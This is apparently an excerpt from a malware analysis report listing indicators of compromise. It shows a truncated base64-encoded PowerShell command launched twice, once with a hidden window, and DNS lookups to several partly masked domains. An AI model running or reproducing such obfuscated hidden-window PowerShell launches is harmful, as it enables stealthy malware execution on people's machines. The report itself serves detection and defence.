Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAASQB5AGwAYQBkAHEAYgBsAG0AIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8AQgBhAHAAegByAHYAaABnAGsAYwAgACMAPgAgACQAQwBnAG0AcABvAHQAbABtAD0AJwBFAHMAeQBpAGkAdg...
- DNS ASK de#.#nolo.it
- DNS ASK st##t.dz
- DNS ASK de#.##rectveilig.nl
- DNS ASK st#####.#aturalbornbullys.co.uk
- DNS ASK te##.##xys-studio.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAASQB5AGwAYQBkAHEAYgBsAG0AIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8AQgBhAHAAegByAHYAaABnAGsAYwAgACMAPgAgACQAQwBnAG0AcABvAHQAbABtAD0AJwBFAHMAeQBpAGkAdg...' (with hidden window)